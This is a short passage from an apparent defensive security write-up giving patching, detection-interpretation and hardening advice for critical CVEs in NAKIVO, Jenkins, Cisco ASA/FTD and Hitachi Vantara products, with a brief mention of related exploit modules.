- **Prevention measures:** Patch promptly upon disclosure of critical CVEs (NAKIVO, Jenkins, Cisco ASA/FTD, Hitachi Vantara); the CVE rules only see attempts, so a hit against a host that was unpatched at the time should be handled as a probable compromise, not as a blocked attack.
- **Hardening recommendations:** Segmenting vulnerable services; least-privilege enforcement.
## Related Tools/Techniques
- Specific exploit modules targeting the listed CVEs.